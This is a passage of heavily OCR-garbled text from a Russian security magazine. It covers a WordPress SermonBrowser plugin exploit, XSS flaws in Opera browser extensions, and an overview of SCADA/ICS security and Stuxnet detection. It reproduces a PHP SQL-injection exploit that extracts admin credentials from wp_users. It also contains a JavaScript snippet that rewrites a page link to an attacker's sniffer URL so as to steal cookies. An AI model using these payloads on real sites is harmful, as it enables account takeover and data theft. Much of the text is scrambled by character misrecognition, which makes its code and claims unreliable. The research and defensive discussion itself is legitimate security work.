ля, либо отключи административный веб-интерфейс. 


ОЕ ИНЪЕКЦИЯ И Х5$5 В 
М/ОКОРКЕ$$ 5ЕКМОМВКОМ/$ЕК 
РЕОСМ 


7.5 (АУ: ММАС: /Ац:М/С:РЛ:Р/А:Р] 


В конце апреля некий Ма3$Тг0-07 опубликовал очередной 
эксплоит под очередной плагин для ВордПресса. Уязвимости 
достаточно тривиальные — это $91 инъекция и межсайтовый 
скриптинг. В результате эксплуатации первой можно получить 
хеш админа, в результате второй — куки пользователей [в том 
числе и админа). 
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р‘р 17214.рПр ПТТр: ИИшиш 


ЧР 


НитАог, 

ПаТте. ‚| н— 20] 

[ осаЁ10оп ‚.;: [ АСбЕЕТЯ ] 

НОГЕ а ПЕ 


НЕ = ЗЕ ЗЕ Е ЗЕ 


== 
== 


5гЭЭтг Я 5ес4еуег МетЬег" 


Рез] Виа Гоипдег вог1ре-0г 


ог той ы : 
|= Ишр/' Е п оа9 


БИ - АНА Ног в55 Зегтопогошег 


Пошп1оа9 .. [| Ишшиш. 4-14. ого. Ц 


Р]ица1п В.43 5 Иуесттоп | 


/шога Г пы 11 10115: ЕГО п-огошеег 


--1+иП1Т ОП *5е1 С++иегет ог 
1] е ВИТ = |] Е =СГ] рт»а]|егт! 


ри Шр-СОПТЕПТ, р 19115 гтоп-огошЕег/ 


иСотЗ Ш ра 1 оса | РОТ 
54 


сот _шогдргес$ 
п 


ФРФЧ9Н ЕГЬ19Р1 РУРИМибуИЗА9ерЦЕлВЕ 


[ЕХРЕОТ 


Эксплоит написан на рЮр, при его запуске в качестве параметра 
нужно всего лишь указать ссылку на уязвимый сайт, дальше скрипт 
все сделает сам. Вотего КОД (исключительно для ознакомления): 


<?рИр 

$4= ( 
табы ев “=> 05ег()”, 

"АБ _уег"=>"уег$1оп()", 
"АБ_пат"=>"дафабазе()", 
"и$г_пт"=>"и5ег_1051п", 
"рама" => "изег_ра$5" 


о: 


фехеЕ2Нех ($$54г1п2) { 
$Лех = ''; 
$1еп = $&г1еп($$%г1пй) ; 
($1 =0; $1 < $1еп; $1++) { 
$Нех .= $%г_раа(деспех (ога ($$+г1п=[$1])), 2, 0, $ТК_РАБ_ 
ГЕЕТ); 
| 
$Пех; 


($Е аз $г=>$у) { 
$х=@Н1е_веЕ_соп%епт$ (Фагв\у[1]. 
"?5егтоп_14=-1/**/ЦпТоМ/** /5еесе/**/вгоир_сопса*(@х". 
фехЕ2Вех("<$г>"). 
"фу, @х".+ехЕ2Нех("<$г>"). 
"), 2+-гот-+мр_изег$+мйеге+ТО=1--" 


О 


ргер мМаесй_а1 1 (Ро. +) г] 1, 9х, 57): 
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Ргебох® | ГУ Ее по Кип 9 х че | 


| За емтые аз г тн < Вет а 12345 < уепре> 


еСПО ВЫ (Е. я [ ТО. п 
=] $г - Ра! еа Ги") 


ТАВСЕТЗ 


\\огаРгез5 ЗегтопВгомизег Рот <= 0.43 


5ОЦУЮМ, 


Нужно обновить плагин до версии 0.44.1 или более поздней. == 


› 049 


97% 


Ш № Тарас Иващенко (А р://ох4де{. по} 


БЕЗОПАСНОСТЬ 


РАСШИРЕНИИ ВЕБ-БРАУЗЕРОВ. 


ОЧЕРЕДЬ ОРЕВА 


Новые векторы атак через аддоны браузеров 


® Через расширения браузеров можно провести немало знакомых 
нам атак. В этом мы убедились в прошлом номере, когда исследовали 
аддоны в004(е СПготе. Сегодня на очереди сверхпопулярный в СНГ 
браузер Орега. Поддержка аддонов в нем появилась недавно, но от 


этого задача только интереснее! 


Чтобы упростить жизнь разработчиков и сделать процесс создания 
расширений максимально прозрачным и удобным, создатели брау- 
зеров предлагают использовать привычные для нас веб-технологии 
для разработки браузерных аддонов. Это дает эффект: все новые 
плагины появляются как грибы после дождя. Но у такой простоты 
есть и обратная сторона медали — возможные риски в безопасности, 
которые во многом нам уже знакомы в аспекте исследования обыч- 
ных веб-приложений. Браузер Орега, разработчики которого непро- 
стительно долго отказывались от системы расширений, наконец-то 
обзавелся таким механизмом. Справедливости ради стоит отметить, 
что к этому моменту в Орега уже была технология виджетов [но мно- 
гие ли этими виджетами пользуются?] и система пользовательских 
скриптов. После найденных уязвимостей в аддонах для Свготе мне 
было крайне интересно пощупать расширения и для Орега. Но для 
этого пришлось разобраться в структуре этих самых расширений. 


Аддон изнутри 


Расширения в Орега очень похожи на аналогичное решение в бооде 
СВгогпе. При их создании также используются популярные веб- 
технологии, такие как НТМИ, С$$ и ]ауа5 стра, а сами по себе они 
базируются на давно используемой при создании виджетов специфи- 


> 050 


кации \\/3С \М9де{ зресйсаНоп. Эта архитектура достаточно подробно 
описана в статье Криса Милса «\\№Ма!'$ п ап Орега ежеп®юоп?» [5 (у/ 


КО\/Ко!.). Нам же для понимания материала хватит знания некоторых 


основных моментов о структуре аддонов. Обычно расширение в Орега 
состоит из следующих частей (некоторые ИЗ НИХ опциональные]: 


» фоновая страница (обычно 1пдех.П{т1) и сопутствующие 
скрипты — это движок расширения; 

» страница всплывающего окна, которое появляется, когда 

ты кликнешь на кнопке аддона в тулбаре веб-браузера; 

» ]ауа$сг1р*-скрипты и С$$-стили для выполнения в соответ- 
ствии с определенными правилами в произвольных, посещаемых 
тобой веб-страницах (например, скрипт, который заменяет все 
ссылки «та11%о:» на соответствующий обработчик твоего любимо- 
го почтового сервиса); 

» файл конфигурации сопЯ&.хт1 (подобно тап1Ре$+. оп в боо51е 
Спготе) — в этом файле указывается мета-информация о 
расширении: название и описание, информация об авторе, 
политики безопасности и другое; 

» страница настроек аддона — для того чтобы расширение могло 
сохранять пользовательские настройки. 
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Ч. 23 - 


53 Ореп бМа! м пем а 


№, Сотросе Май $} РгеГогепсое 


Тнеге 15 опе ипгеаЯ теззаде 


Ограниченная Х$$ в бооде Май МоНйег 


Пользовательские скрипты 
в Орега 


Технология пользовательских скриптов (Ц5ег.)5}, про 
которую ты наверняка уже слышал и даже применял, 
позволяет пользователю подключать к произ- 
вольным страницам, которые он посещает, свои 
]ауа5спр\-скрипты. Эти скрипты будут исполнены 
веб-браузером перед загрузкой целевой страницы 
прямовее контексте (это очень важно]. Пользо- 
вательские скрипты могут быть использованы для 
разных целей: 


» «вырезание» надоевшей рекламы на любимом 
ресурсе, 

» добавление произвольного НТМЕ-кода на 
страницу (например, виджеты социальных сетей); 
» исправление каких-либо мест (которые достав- 
ляют неудобства) на странице; 

» для чего угодно в рамках текущего документа 

и возможностей Зауа$сг1 ре. 


Для примера приведу следующий небольшой скрипт, 
который выделитна странице все ссылки, которые 
ведутна домен, отличный оттекущего: 


// ==У5ег$сг1ре== 
// @1пс1иае Пр: / /ехатр1е .сот/* 
// ==/Узег$сг1р*== 


(РипсЕТоп () 
{ 
\аг 11пК$ = аоситепе . ве*Е1етепе$ВуТаеМате (‘а’); 
ог (маг 1 = 0; 1<11пК$.1епёЕИ; 1++) { 
1+ (11пК$[1].Вге+ .1паехо-+ ( "Ир: //" + 
оситеп* .аота1п) != 9) { 
]11пК$[1].1ппегТехЕ = '[->] "+ 
]11иК$[1].1ппегТехе; 
} 
} 
в, 


Обрати внимание на необязательную, но весьма 
полезную шапку скрипта, в которой можно указать 
описание сценария, атакже некоторые параметры 
(кпримеру, для каких доменов его необходимо под- 
ключать). 
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Обход правил доступа в расширении бооде 
Май МоНнйег для посылки полученных данных 


Эти главные составляющие расширения взаимодей- 
ствуют между собой посредством специального меха- 
низма сообщений: 


Внедряемый скрипт <-> Фоновый процесс <-> 
Кнопка/Бейдх <-> Всплывающее окно 


Все эти части, за исключением элемента «Кнопка/ 
Бейдж», имеют доступ к «своему» специальному Орега 
Ежепзоп$ АР! со следующими правилами: 


» Из фоновой страницы доступны объекты м1 пдом. 
м195еф, орега.ехфеп$1оп и орега. сопфех{$ - в этих 
рамках можно делать все что угодно, например, 
создавать элементы пользовательского интерфейса. 
Но при этом у тебя нет прямого доступа к содержанию 
открытой пользователем страницы. 

» Внедряемые скрипты имеют полный доступ к содер- 
жимому посещаемых пользователем страниц (чтение и 
модификация) и они могут общаться с другими 
частями расширения через упомянутый выше механизм 
сообщений. 

» Страницы всплывающих окон могут общаться с дру- 
гими частями расширения, работать с настройками 
аддона ит.д. 


Х$$ 


При первом же рассмотрении можно увидеть разницу 
между Орега и боод(е СБготе в контексте взаимодей- 
ствия расширения с внешними ресурсами (картинки, 
формы ит.п.]. Возьмем для примера расширение для 
оповещения о новых письмах боод(е МаЦ Мо{йег. 
Удивительно, но, как и в подобном расширении для 
Соод(е СПготе, тут нашлась уязвимость — небезопас- 
ное использование входных данных, которое может 
привести к атакам вида Х$5. В нашем случае злоу- 
мышленник посылает жертве специальным образом 
сформированное письмо со зловредной нагрузкой 

в поле темы или теле письма. Когда жертва получит 
письмо, а расширение оповестит его об этом, сработа- 
ет нагрузка. 

В силу используемых технологий исходный код рас- 
ширения, как правило, доступен. Чуть поковырявшись, 
находим в исследуемом аддоне уязвимый участок кода 
([5/гпепчи.]$]: 


// СПеск 1+ «Пеге аге Мез5аве$ фо 915$р1ау 
1+(емеп{* .4афа.т$5 && еуеп*.4афа.т$я.1епаеИ > 9) 


{ 


[НТТР://ММИМ 


› ИпК5 

® \\/ ЗС Ма де{5 
зресшсайоп: 
ммм м3. ого/ТКАмадЕЕ. 


® Механизм междоку- 
ментных сообщений: 
00.9950. 


® Орега Ежеп$юп$ АР!: 


млллм.орега.сого/9ос$/ 
ар!/ех{ептзюп5/. 


® Все про ХЗ5: 
доо.9ИТеуд(. 


® Информация по по- 
литикам безопасности 
расширений: 
доо.дИВИККМ. 


® де Ассез$ 
Кедчцез Росу: 
млм. м3. ога/ТВ/ 
м9 де{$-ассезс/. 


® Локументация по 
Озег./5-скриптам в 
Орега: млм. орега. 
сот/Чос$/изег|/. 


| МАВММ6_ 


› магптд 

Вся информация 
представлена в озна- 
комительных целях, 
чтобы показать раз- 
работчикам на слабые 
места в их продуктах. 
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Нап 5-оп ога: Быт ал Орега ехфегезног, = бе, Ораига - Суриига - +и 
ОЕжепзюп 1... х | @ ММГ 5 ИТ ал... х |  Ежепззоп5 +. х |  Севпо Зал. х | ® \Ипаг5 п ал... х | ® Налфз-оп ш.. х || + | 
> 5 № © М чм орега сопла ев Алеиу и опа -де -сория В - Е- — Ы т а .- ЫВ 


эугисфиге от ап Орега ехфеги оп 


> ББ ехитры_пепюл 
> исчез 
ырег 55.5% 


+ ошлаае 


а маг. 
$) бе». питты 
$) роршр. Лет 

баскогокла. 


> | опти 


Рирле 1 ТЬе Флестоку эпосе 0 оп Орега воеосьасит 


т а О-В Л Пт -та- Г 


* Екетакить таг: Карие: в Ого хоть бе. мВ уси сал га Небо» Сурен 

* Екепеюлиь пн: сооайл сле бас ксиоао риссяеыь. йе (турисайу: ал: Итекс. НЙ 

. Лачазьснре го 68 “ВАиесыьог вл д рабие ыы. ее ыл д НОЯ ГЗБГЬеАС пгс Ас 
Е О 


Аз УСО крест. ОНТ ФКН нога С Увлу НОТ БАЗИС 1 СОАрНУк, БСА: МЗ ЗАРИ ПО УМААА Пару 0. РИО 
2 БРаслАМЬ ПР СИЛеСЛегУ ЗАЛЬЕЛЬЙЕ: СИ д Гели ефу СОбПрИех екагприе ектепаног Уелаая пре витирыеА Тур: мАИИ 
54 а ситума ]Лагазепр: Пе аррвоа 1 а мб раде. 15“ Гу Пе силе арргоаеВ: НН Но ЛЕО 1105 00 


АТИ ПТые ЛТА ОГ ПИНЫ АП СоеИ ея БИС, вт |РЫе ЗымАни 


Зирег энире сои. ии 


ЗАер оп, мае гео д со ку Пе сопбаятьы Иер аалие, фоеорАнсит ог об Рнси йе енот 


Новейшая версия Орега 


// АДА еуегу тез5авде 
Фог (маг 1=0; 1 < еуеп*.дафа.тзв.1епаеИ; 1++) 
{ 
уаг оо] 1р = "<41у с1а$5='Фо01%1р' ><р><и>" + 
1ап.рорир_ Фо + " " + еуеп{ .адафа.т5=[1].зепдегта11 + 
"</и><бг/>" + Тапё.рорир_№гот + " "+ 
еуеп{ .Чафа.т$5[1].аи{Погта11 + "<Бг/><6г/></р><р>" + 


еуеп{ .афа.т$=[1].зиттагу + "</р>" 


\аг м$# = $( '<491\></41\>').ааас1а$$('тез5аге') .а+г( 
пет Ете", тоо1Е1р). тооТЕтЬ( 
1е+е: -15 

}) 

„Пт ("<$5гоп8>" + емеп*.дафа.т$=[1].аиЕПогпате + 


"</5{гопв> : " + емеп* .дафа.т$[1].11%1е).с11ск( 
{ 

]1пК: еуеп*.аафа.т$8[1].11пК 
}, ГоааЁ1пк); 


$('Нте55аве_Бох').аррепа(т$=); 


Явно видно, что при формировании списка писем соответствую- 
щие параметры письма используются безо всякой обработки 

и вставляются прямо в НТМ(-код. Типичное место возможного 
внедрения зловредного кода в расширениях (в Орега и боод(е 
САготе} — это страница всплывающего окна, которая обычно 
формируется фоновым скриптом на основе входных данных, 
которыми могут быть, например, К55-потоки или информация о 
непрочитанных электронных письмах. ИМХО, в реальном мире 
при аудите безопасности расширения этими сценариями не стоит 
ограничиваться. Вполне вероятным может быть и небезопасное 
использование так полюбившегося веб-разработчикам формата 
450М! Традиционно опасным считается использование в таких 
случаях функции исполнения /Уауа5спр{-кода, то есть ема{]), 
например, вот так: 
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\аг тз8 = еуа1(" (" + гезропзе_{ех® + ")"); 


Вместо того чтобы использовать специальное АР! для разбора 
45$ОМ-сообщений: 


уаг т$55 = 350М.рагхе (гезропзе_%ех{); 


В таких случаях зловредная нагрузка может быть исполнена уже 
в контексте фонового скрипта, что влечет более тяжкие послед- 
СТВИЯ. 


Потенциальные цели 


Одной из самых популярных целей для Х55-атак является похи- 
щение аутентификационных данных в виде, например, сессион- 
ных кукисов. В настоящий момент разработчики Орега не пред- 
усмотрели возможность доступа к основному хранилищу кукисов 
веб-браузера (как это сделано в боод(е Спготе)}, а у каждого 
расширения — как бы свои собственные кукисы. Но это вполне 
вероятно скоро может измениться под напором просьб разработ- 
чиков расширений. Следующие данные, доступные из расшире- 
ния, могут быть интересны злоумышленнику при проведении им 
Х$5-атаки: 


» собственно кукисы самого расширения, потому как в большом 
количестве случаев с социальными расширениями, там хранится 
все тот же сессионный идентификатор; 

» настройки расширения, доступные через объект м1авеф. 
ргефегепсе$ — например, там могут быть имя пользователя и 
пароль, как в случае расширения для работы с популярным 
сервисом Кеаа1{ Епуе1оре; 

» контекстная информация -— в нашем примере с боо=1е Мо{1вег — 
это данные (адреса, темы и другое) писем жертвы; 

» банальный «фишинг» — даже в ограниченном контексте 
злоумышленник может использовать рассматриваемую уязвимость 
для фишинг-атак (см. скрин). 
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Раз\м/ога: 
| бути 


Вариант эксплуатации дырки в виде фишинг-атаки 


Как передавать данные 


Обычно, для того чтобы передать данные со стороны жертвы, злоу- 
мышленник использует так называемый снифер. К примеру, просто 
внедряет с помощью /ауа5спр{ картинку с адресом, включающем 
данные из объекта Чоситеп.сооке в качестве параметров. В случае 
с расширением в Орега такой трюк так просто не пройдет в силу 
политики безопасности, о чем недвусмысленно говорит документа- 
ЦИЯ: 


Исходя из политики по умолчанию, агент пользователя 
(например, веб-браузер) должен запрещать доступ к сетевым 
ресурсам, внешним по отношению к виджету, независимо от того, 
каким образом этот доступ запрашивается — через АРТ-функции 
(например, ХМЕНЕЕрКеаие${) или через разметку документа 
(например, с помощью тегов 1+гате, сг1ре, 118). 


Наше тестируемое расширение имеет следующие правила доступа к 
внешним ресурсам, прописанные в файле конфигурации: 


<!-- Ассе$$ Ро]1су --> 
<‹ассе$$ ог1в1п="И рез: //та11.в2оов1е. сот" /> 
<‹ассе$$ ог1в1п=" Ире: //ммм. в0021е.сот"/> 


Элемент <ассез$> дает возможность авторам расширений явным 
образом обозначить, с какими внешними ресурсами расширение 
собирается работать. Это значит, что если, например, расширению 
требуется даже просто показать картинку с внешнего ресурса, то 
необходимо это указать в этой опции! Для демонстрации в тести- 
руемом расширении пришлось использовать логотип бооде с хоста 
млллл/.доос(е.сого, который подпадает под эти правила доступа. При 
этом есть два момента, которые стоит учитывать злоумышленнику в 
рамках ХЗ5$-атаки: 


» автор расширения может указать звездочку (*) в качестве 
значения «ог151п» для того, чтобы его расширение имело 
неограниченный доступ к сетевым ресурсам; 

» атрибут «зибаота1п$» регулирует доступ для субдоменов 
указанного домена («привет»-блоги и прочие социальные ресурсы 
с пользовательскими субдоменами). 


Но есть и другой трюк, который мы можем провернуть — можно 
сделать ссылку или другой интерактивный элемент пользователь- 
ского интерфейса с необходимым адресом. Когда жертва кликнет 
по ссылке и перейдет на сайт злоумышленника, последний получит 
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требуемые данные. Например, в следующем коде показано, как 
можно заменить произвольный элемент интерфейса, чтобы запутать 
пользователя и заполучить кукисы: 

И 

\уаг а = аоситеп* . сгеафеЕ1етепт* (‘а’); 

\уаг 4 = доситеп* . ве Е1етеп{ВуТа( 'ореп'); 

а.ПгеР = "Пер: //еу1151е. сом/ зп ЕР .рИр?а=..."; 

ата = 100, 

а.1ппегТехЕ = 'Ореп СМа11 Таб'; 

а.рагепЕМ№оае .гер1асеСр11а(а, а); 


Взаимодействие расширений 
и безопасность 


В противовес боод[е СПготе, Орега не позволяет расширениям 
явным образом взаимодействовать между собой. У меня было пред- 
положение, что внедряемые скрипты, будучи развитием популярной 
технологии пользовательских скриптов Цзег.)5, все-таки могут взаи- 
модействовать через общий документ, в который они внедряются: 


Пользовательские Зауа$сг1р*-скрипты выполняются в 
глобальном окружении — это означает, что все объявленное 

в скрипте будет доступно в рамках веб-страницы. Учитывая это, 
рекомендуется помещать основной код скрипта в тело анонимной 
функции для того, чтобы явным образом ограничить доступность 
данных скрипта в рамках веб-страницы. 


Но судя по всему, разработчики Орега решили подкрутить безопас- 
ность. У меня не получилось добиться того, чтобы из одного 
внедренного скрипта прочитать данные [значения переменных] 
другого, загруженного перед ним в рамках общего ООМ. Ни одна 
попытка не оказалась удачной. Получается, что остается только 
одна потенциальная возможность навредить из одного расшире- 
ния другому — подпортить страницу, с которой оба аддона взаимо- 
действуют. 


ОштТо 


Расширения В Орега имеют очень похожую архитектуру, что и в 
Соод(е Срготе. Более того, даже уязвимости в них встречаются 
практически идентичные. 

В то же время, в силу изначально закрученных гаек в подсистеме 
безопасности, либо попросту из-за того, что что-то из критичной 
функциональности (доступ к кукисам браузера, истории и заклад- 
кам] не реализовано, злоумышленнику сложнее эксплуатировать 
найденные в расширениях Орега уязвимости. Но ТУТ НЕ. СТОИТ забы- 
вать, что система аддонов этого браузера еще молодая и постоянно 
изменяется, в том числе под напором просьб разработчиков. Так 
что кто знает, что и как будет устроено через некоторое время. 2= 
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Ш м Юрий Каминков ([КаттКоу@де!епсе.ги), НТЦ «Станкоинформзащита» 


Распределение 5САБА с указанием степени их защищенности от несанкционированного выявления 


Финляндия 

КоскмеЦ Ащотаноп — 45% 
Агеуа Теерегт Х$ — 25% 
Тек!а ХРомег — 20% 

Месоп 3000 — 15% 

тео ОМА — 10% 


— > 


Канада 

Эсппеег Е есс$ — 40% 
\Мопаегмаге |пТочсй — 30% 
Мизиы$В! МХ4 5САПА — 30% 


США 
СЕ С МРСку — 45% 
СЕ ХА21 ЕМ$ — 24% 
Ргойсу САША !ЕХ — 20% 
Агеуа ЕМ$ 5САПА — 11% 


Нидерланды 
Зетепз М/т СС — 49% 
АВВ Капдег — 34% 
Ре\ие — 11% 

Вз\Мем/ $САБА — 8% 


Южная Америка 
\Мопдегмаге |пТоисй — 45% 
Ргойсу ЗСАШВАТЕХ — 30% 
Скце<САПА — 20% 
Мотого[а 5САПА — 5% 


ПОД ПРИЦЕЛОМ 


Китай 

\Мопаегмаге |пТоисВ — 45% 
ЭСАПА Ахеда — 34% 
Другие — 21% 


<” 


Камбоджа 
АТА РЕЗ — 55% 

СН $САОА — 45% 
РУ! Сопго! — 33% 


э-ь 


аб 


„2 


Вьетнам 

| \\МопЧдегмаге пТоисВ — 44% 
и 501.0М№'5 5САПА — 34% 
ССАПА Ахеда — 22% 

—^ 


7 сл 


о 


Тайланд 
\Лел\и Баг 750 — 55% 
Р!ара — 45% 


Индонезия 
Сцес{ЪсСАПА — 55% 
Четепз$ М/я СС — 45% 


© Русин В. [гизт@наеепсе.ги] 


Степень выявления 


в Высокая 
() Умеренная 
( ) Низкая 


о Не определена 


Анализ защищенности АСУТП 


® Червь З4ихпеф, обнаруженный на атомной станции в Бушере, наделал 
много шума. Кто стоял за всем этим? На этот вопрос не ответят еще 
несколько десятилетий. Объекты критически важных инфраструктур 
представляют большой интерес для многих, начиная с конкурирующих 
корпораций и заканчивая спецслужбами враждующих государств. 


Насколько дыра широка? 


Важные инфраструктурные объекты тщательно охраняются, поэтому 
пройти туда или пронести на территорию что-то стороннее — край- 
не затруднительно. В связи с этим наибольший интерес представ- 
ляет возможность удаленной атаки. На сегодняшний день каждое 
государство определяет для себя список наиболее важных узлов. 

И хотя этот список составляет государственную тайну, абсолютно 
очевидно его содержание: объекты электроэнергетики, ядерной и 
атомной отраслей, сектор транспортировки углеводородов, нефте- 
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химия, стратегические военные сооружения. Естественно, многие 
из этих объектов подвергаются процессу автоматизации с исполь- 
зованием информационных технологий, что в комплексе представ- 
ляет собой автоматизированную систему управления технологиче- 
скими процессами [АСУ ТП]. В состав типовой АСУ ТП входят три 
основных компонента: система диспетчеризации (5САПА), теле- 
метрическая подсистема, инфраструктура коммуникации на базе 
доступных промышленных протоколов передачи данных. Зачастую 
в зарубежной литературе термин «АСУ ТП» опускают, говоря только 
о системах 5САВА, но важно понимать, что диспетчеризация не 
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1. Исполнительные 
устройства 


Сервер МООВИ$ 


Типовая топология технологической сети 


позволяет интерактивно управлять процессом всей 
системы управления. 


Инструментальная 
подготовка 


Какой инструментарий потребуется для анализа безопас- 
ности АСУ ТП, учитывая, что дело придется иметь с 
системами диспетчеризации и управления технологиче- 
скими процессами? Здесь придется работать на стыке 
известных тебе технологий и отдельных специальных 
решений, поскольку 60% известных АСУ ТП и систем 
ЪСАПА развертывается на традиционных платформах 
ММпдоми, Ипих). При необходимости используют плат- 
формы реального времени (жесткого, мягкого), такие как 
ОМХ, которые гарантируют исполнение той или иной опе- 
рации с заданным интервалом времени в условиях СРВ 
(системы реального времени), хотя большее применение 
они находят в продукции военного назначения (БПЛА, 
бортовое управление]. На сегодняшний день известно 
не так много узкоспециализированных программных 
средств анализа защищенности АСУ ТП / $САПА: 

® ПК «5САОА-Аудитор» [отечественный сканер для ана- 
лиза защищенности технологических сетей, АСУ ТП / 
ССАБА); 

® ГеепаЦе Меззис [содержит несколько модулей прове- 
рок систем 5САПА и ряда программируемых логических 
контроллеров в коммерческой версии}; 

® Кар! 7 Меазрой Рго]ес{ [там совсем все грустно: в 
разделе «ехр/о{$/зсада/» всего лишь несколько пар узко- 
ориентированных сплоитов). 

Естественно, помимо специализированного софта в 

ход идет и традиционный инструментарий — например, 
сетевой сканер ппар. Кстати, и он следит за последними 
тенденциями в информационной безопасности: недавно 
в нем появился плагин, позволяющий выявлять на узле 
заражение З(ихпеГом. 


Типовые угрозы 


Рассмотрим наглядно, какие угрозы влечет за собой 
типовая топология технологической сети. В ней выде- 
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172.16.1.0 


‚ ТСРЛР 


154.68.54.ХХ 


2. Парк АРМ- 
операторов ЭСАБА 


ляют (в зависимости от природы технологических про- 
цессов] три зоны: корпоративную [не имеет никакого 
отношения к управлению, занимается исключительно 
бизнес-процессами}, исполнительную (звено, где непо- 
средственно выполняются технологические процессы 

— например, перерабатывается аммиак или осуществля- 
ется управление движением нефти] и зону диспетчериза- 
ции (там сидят операторы АСУ ТП, которые могут повли- 
ять на ход выполнения технологического процесса). 

1. Исполнительные устройства и подсистема телеметри- 
рования. 

Очень часто электронная компонентная база исполь- 
зуемых устройств не позволяет внедрить туда столь 
популярные технологии как |Р$ес или $51, организовать 
УРМ. Тем не менее, доступ к этим девайсам нужен всег- 
да. Более того, некоторые из них выступают в качестве 
устройств сбора информации [телеметрии] о показателях 
выполнения технологического процесса с датчиков и так 
далее. В них же могут накапливаться сообщения о трево- 
гах и авариях, что весьма критично. В связи с этим очень 
важно назначать им публично доступный 1Р-адрес, что, 

к сожалению, встречается сплошь и рядом. В некоторых 
ситуациях избежать этого невозможно при допущениях 
ошибок проектировки сети. Например, современные 
промышленные контроллеры могут быть соединены 
напрямую или через модем. При подключении через 
модем их часто объединяют с СРВ$/6$М-модемами, 

что по умолчанию наделяет устройство |Р-адресом 
мобильного оператора. При такой конфигурации они 
очень уязвимы для атак извне. Специализированными 
утилитами и методами злоумышленник может выявить 
подобные девайсы и натворить много плохих дел. Сами 
исполнительные устройства, как правило, подключаются 
по последовательному интерфейсу [Р5-232 / В$-485] к 
МООВО5-серверу, а непосредственно МООВО5$-сервер 
имеет управление по ТСРЛР через канал Е{Негпе{ / 
|пацзта[ Е{егпе{ с операторами. 

2. Парк АРМ-операторов и системы $САПА. 

Эти товарищи находятся в самом сложном положении, 
поскольку вопросы режима среди них зачастую не 


3. Корпоративная 
зона 


[НТТР://\ИМ\/ 


р ИпК5 


Многие факты про- 
никновения хакеров в 
подобные системы так 
и остаются за кадром. 
То, что вырвалось на 
публику, попадаетв 
специальные базы, 
одна изних — |: 
зесиг{упс!Чет{$.0гд. 


| 0У0 


› ЧУЧ 


® На диске ты найдешь 
сканер для обнару- 
жения зараженных 
ЗихпеГом узлов от 
компании Тгепа М'сго. 


® Кроме этого, на 

0О\О доступен сканер 
уязвимостей Теепа{е 
Мез$и, который реа- 
лизует ряд проверок 
для систем 5САПА. 
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ее ы Бир ТТИ Гей 
| В сет вены ото 
ЗБ утв БЫ ТОР РИС рый т рашаи 2 ТИТУТЬ Зара три. пыирааи 


вже --ус гроза гаш. 


С использованием специальных сканеров можно легко найти 
З(ауе-девайсы, работающие по протоколу М00ВЦ$ 


соблюдаются. Вторая проблема — к ним часто допускают иностран- 
ных специалистов, которые могут иметь не самые благие намерения. 
Например, в истории червя З{ихпе{ на атомной станции в Бушере 
ключевую роль сыграл инженер-инсайдер обслуживающего подраз- 
деления, который пронес на станцию У5В-носитель с вредоносным 
софтом. Сколько таких товарищей бродит по атомным станциям в 
мире — остается вопросом. Операторы имеют возможность подклю- 
чаться к системе $САПА, как правило, с разным уровнем привилегий, 
планировать и внедрять новые проекты, изменять существующие. 
Несмотря на множество уязвимостей в ПО систем диспетчеризации, 
основной угрозой по-прежнему остается инсайдерство. 

3. Корпоративная зона (ВАМ — Визтез$ Агеа Ме\могК). 

В ней сидят люди, которые управляют с точки зрения бизнеса всем 
тем, что мы рассмотрели выше. Физически они часто находятся на 
значительном удалении от самого производства. В секторе энергети- 
ческих или нефтетранспортирующих организаций это особенно оче- 
видно. Все их хозяйство может находиться на различных континентах 


Этихпегом 


В состав ММАР”а новой версии [5.51] вошел интересный плагин, 
написанный на языке программирования ГА для ММАР $сгрипт9 
Епдгпе, имя ему — Зихп&{-деес*. Исследовать узел на предметна- 
личия червя 5{ихпе{ через $МВ-сессию очень просто: 

пар --$сгирё $ихпе{-деес{-р 445 <По${> 

Кроме этого, для обнаружения зараженных узлов можно пользо- 
ваться сканером, созданным специалистами компании Тгепа Мгсго. 
Взять его можно либо на нашем ПОУО, либо на сайте компании (И. 
у/свок{а). Какже работают эти сканеры, и как вообще работает 
ихпеЕ? 

ЗихпеТ регистрирует свой КРС-сервер для осуществления вну- 
треннего и внешнего взаимодействия с зараженными узлами в 
качестве отдельной ноды. Функционал КРС-сервера настроен на 
выдачу [проверку] версии червя, атакже на выполнение функции 
обновления (загрузку новых экземпляров}. Соответствующие ВРС- 
вызовы могут быть исполнены от центра управления этим «про- 
мышленным» ботнетом. Центр дает команду на проверку версии 
(0х00), в случае ее «старости» осуществляется вызов функции об- 
новления (0х04). Предварительно проверяется доступность службы 


5МВ-о\ег-ТСР [ТСР 445}, после чего эксплуатируются уязвимости, 


заложенные в данную версию 5\ихпе{ (например, М$510-061), осу- 
ществляется биндингкхарактерному именованному пайпу через 
ОСЕ/ВРС [«//бгомизег» — в большинстве случаев), поиск ЧИ и его 
последующий анализ. Красиво! 

Вторым способом является поиск «вгруженного» в планировщики 
задач зловредного кода З{ихпе(. На основе данной методики и 
работает сканер Тгепа Мисго. 
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2 Бр ББ ечей со СЕНЕ ЫН БЕ о ЕЛЕ 2 бы о ПЕнеЕЯ о БОЕ РЕНН: = НЫЕ иене. Ск» 
Я Пей ры 


ши. Сира ры | ш ——. зи ии 


а 
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Выявлен НМ! — человеко-машинный интерфейс одной из систем 
диспетчеризации. Иногда такие вещи стоят на специальных 
промышленных компьютерах или стойках в цехах или заводах. 
Аптайм совсем небольшой, видимо после рестарта. Угроза 
проникновения на такой девайс чревата попаданием в сегмент 
технологической сети. 


— например, в виде линий энергогенерирующих комплексов или 
нефтяных вышек в Ливии, а сами они могут сидеть в какой-нибудь 
теплой безобидной стране. По-настоящему ВАМ озабочена только 
одной задачей: извлечением прибыли, поэтому большую часть вре- 
мени они посвящают изучению биллинга, финансово-экономическим 
вопросам своего бизнеса. 


м 
вх 


ты 
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Сысталльы ПАД 


Пред ррынсетый нцраненынй 
уе пофеивск 1 рр ПЕНА 
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ВНЕ Дб тектиюии “М аси“ 
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Таней Баны Ты” за Мы п неа 
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16 НИ д Ц Научное Нрои: 


ПЕ Дственнов 


т | р ИП я } ОБИ г | 


жк в  МОКАНЫТО 
| 
ЗСАПА = снстама "КАСНАД” 


ебыгый рнетрузуент дея 
реа пуъебстииты: ГУТ 


Ил пирвани струи! ПЫШНО 
ЗС тент Кения 


Ш иы ма г То 
Р-Р 

о еде. {СБ Фо Неа Брно ке ри 
о к а. 


аеаиь: И ьшино свыше дрожит скке = селен: 


ое мы 
А. БИ 5 02 БЕ са лы т живи а ть 


В составе используемой 5САБА была известная СУБД Нгеб!г 4. К сожалению (или к счастью), в ней фигурировала уязвимость реализации 
